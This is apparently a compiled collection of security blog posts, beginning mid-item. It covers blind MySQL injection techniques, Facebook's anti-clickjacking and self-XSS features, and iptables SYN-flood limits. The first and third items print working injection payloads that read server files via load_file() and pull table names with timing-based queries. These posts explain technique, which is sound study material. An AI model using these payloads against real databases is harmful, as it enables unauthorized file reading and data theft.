I compared the few bruteforced characters to a known Apache configuration file, trying to map the characters to a common configuration comment. This worked for most of the character sequences, but unfortunately almost every configuration file is a bit different, so it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example, the bruteforced string "dulesthoselisted" could be mapped to the comment "modules (those listed by `httpd -l')" and so on. After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467; after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting, and I could retrieve "srvhttpdhtdocs" (DocumentRoot: /srv/httpd/htdocs/).

While that worked fine during the hectic CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and realized that this technique was plain stupid. If you know what you are looking for in a file (and mostly you do), you can easily find the correct offset with LOCATE(substr,str[,pos]), which returns the offset of a given substring found in a string.

The following query instantly returns the next 10 characters after the DocumentRoot setting:

    substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)

and can then be bruteforced easily:

    mid(lower(substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)),$k,1)=0x$char

No magic here, but a helpful combination of MySQL built-in functions when reading files blindly.

Source: Blind SQL injection with load_file() « Reiners' Weblog
22. Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS

May 13th, 2011 | By Josh Constine

Facebook has released several new security features designed to thwart unauthorized logins, cross-site scripting, and clickjacking that tricks users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to a user's phone, while self-XSS and clickjacking protection warns users and requires them to confirm their actions when pasting links into their browser or clicking suspicious Like buttons. These protections should reduce the prevalence of hijacked accounts and of highly visible spam in the news feed that perpetuates the public perception of Facebook as less safe than the rest of the internet.

Facebook's latest internal security efforts were announced alongside a new partnership with Web of Trust, a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords.

Login Approvals

Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which will require them to verify their phone number. Once enabled, any time someone attempts to log in to the account through a new or unrecognized device, they'll have to enter a code sent to their phone via SMS. Users will also be notified, the next time they successfully log in, of any suspicious attempts thwarted by the Login Approvals feature. Users with Login Approvals could be temporarily locked out of their account in the unlikely event that both their phone and their approved Facebook login device were lost or stolen.

Still, the feature offers a strong additional layer of security for those who opt in to it. It can also serve to protect users who may share their password with a loved one for use on their regular login device, but who don't want those people to access their account from elsewhere.

Clickjacking Protection

Clickjacking refers to a malicious website concealing an active link beneath an image or other disguise to fool a user into clicking a link they didn't intend to. In the case of Facebook, malicious sites sometimes conceal Like buttons beneath video players or appealing offers, leading users to inadvertently share the spam site to the news feed and drawing more users into the scam. Facebook already has automated systems designed to identify and disable uses of the Like button for clickjacking, as well as to block or remove outbound links to clickjacking sites. Now Facebook has added additional protection against the tactic by requiring users to confirm that they wanted to click a Like button that is suspected to be part of a clickjacking scheme. The Like won't go through and stories won't be published to the news feed unless the user confirms. This feature could cut down on one of the most prominent Facebook security threats of late, which has spread through links that promise videos of racy or gruesome content.

Self-XSS Protection

Self cross-site scripting is a security threat in which a spam news feed story, wall post, or message asks users to copy malicious code into their browser, thereby causing a hacker's message to be posted to additional friends. These threats have become increasingly sophisticated over the years (if you want to get deeper into the topic, be sure to check out security researcher Joey Tyson's Social Hacking blog). The new security feature detects when users attempt to paste malicious code into their browser, displays an alert explaining why the practice of copying code into a browser is dangerous, and prevents the code from being run.

By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future.

Source: Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS
23. Optimized Blind MySQL Injection Data Retrieval

Posted on March 31, 2011 by Roberto Salgado

I recently came across a paper titled Faster Blind MySQL Injection Using Bit Shifting by Jelmer de Hen, describing a technique that allows the retrieval of data from a MySQL database in only 8 requests per character using bit shifting; this is a slight improvement over the traditional bisection method. This got me thinking about how information could be extracted from the database in even fewer requests, and after a few hours of fooling around, this is what I came up with:

    AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1),
    'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1)
    FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));

A quick explanation of how this query works and what it does. It starts off with your basic blind injection, selecting only 1 character at a time from the table:

    SELECT MID(table_name,1,1) FROM information_schema.tables LIMIT 1

It then uses FIND_IN_SET() to look for the position of the extracted character in the list. So for example, say the table is CHARACTER_SET: MID("CHARACTER_SET",1,1) = 'C', therefore the returned value for FIND_IN_SET('C', 'a,b,c') would be 3 (case insensitive). We then proceed to use BIN() to convert it to binary, BIN(3) = 11. Now that we've reduced each digit to two possibilities, 1 or 0, we only have to check whether the digit is 1; if not, we can assume it's 0. So BIN(3) = 11 would take 3 requests: Is the first digit 1? Yes. Is the second digit 1? Yes. Is the third digit 1? No, there is no third digit, so it triggers the SLEEP() function. Now we know that CAST(b'11' AS DEC) is 3, and that's the equivalent of 'c' on the list, all in 3 requests! Say your list contained 45 elements: BIN(45) = 101101, still making the total number of requests only 7 for characters in later positions on the list.

I'm sure this could be optimized and greatly improved, possibly by removing the need for FIND_IN_SET() and using a more effective function. One idea would be to split the list into two requests; this way you can ensure the length of the binary doesn't grow too big.

Downside: the query can be a bit longer than normal, and it requires SLEEP() to know when you've reached the end of the binary.

Another possible solution that doesn't require SLEEP(), but would require two different pages (test.php?id=0, test.php?id=1), could be done with something like this:

    IF((@a:=MID(BIN(FIND_IN_SET(MID((SELECT table_name FROM information_schema.tables LIMIT 1),1,1),
    'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ')),1,1))!='',@a,0/0);

UPDATE: Two things I just thought I should point out. First, this technique doesn't necessarily require FIND_IN_SET(); there are plenty of other similar functions that could be substituted in its place (locate, position, instr, field), just to name a few. Secondly, the use of quotation marks can be avoided. For example:

    FIND_IN_SET(0x33, CONCAT_WS(0x2C,0x31,0x32,0x33));

Source: Optimized Blind MySQL Injection Data Retrieval
24. Linux Iptables: Limit the number of incoming TCP connections / SYN-flood attacks

by LinuxTitli on June 26, 2005

A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system. This is a well known type of attack and is generally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK. If half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. A SYN flood is a common attack and it can be blocked with the following iptables rule:

    iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN

All incoming connections are allowed until the limit is reached:

    --limit 1/s:      maximum average matching rate, per second
    --limit-burst 3:  maximum initial number of packets to match

Note that RETURN only does useful work inside a user-defined chain, where SYN packets that exceed the limit fall through to a final DROP, which is how the script below arranges it. Open your iptables script and add the rules as follows:

    # Limit the number of incoming tcp connections
    # Interface 0 incoming syn-flood protection
    iptables -N syn_flood
    iptables -A INPUT -p tcp --syn -j syn_flood
    iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
    iptables -A syn_flood -j DROP

    #Limiting the incoming icmp ping request:
    iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT
    iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP:
    iptables -A INPUT -p icmp -j DROP
    iptables -A OUTPUT -p icmp -j ACCEPT

The first rule accepts ICMP ping requests at 1 per second, with an initial burst of 1. Once that level is crossed, the second rule logs the packet with the PING-DROP prefix in /var/log/messages (the LOG rule carries the same limit, so the log itself cannot be flooded). The third rule drops every packet that exceeds the limit. The fourth and final rule allows outgoing ICMP, so replies to existing ping requests and the host's own pings still go out.

Where:

    --limit rate:          maximum average matching rate, specified as a number with an optional '/second', '/minute', '/hour', or '/day' suffix; the default is 3/hour.
    --limit-burst number:  maximum initial number of packets to match; this number gets recharged by one every time the limit specified above is not reached, up to this number; the default is 5.

You need to adjust --limit and --limit-burst according to your network traffic and requirements. Let us assume that you need to limit incoming connections to the SSH server (port 22) to no more than 10 connections in 10 minutes:

    iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT
    iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP
    iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 --sport 22 --dport 513:65535 -m state --state ESTABLISHED -j ACCEPT

Source: Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks
25. I haven't tested it; I'm not into this kind of thing. Be careful, the files may be infected.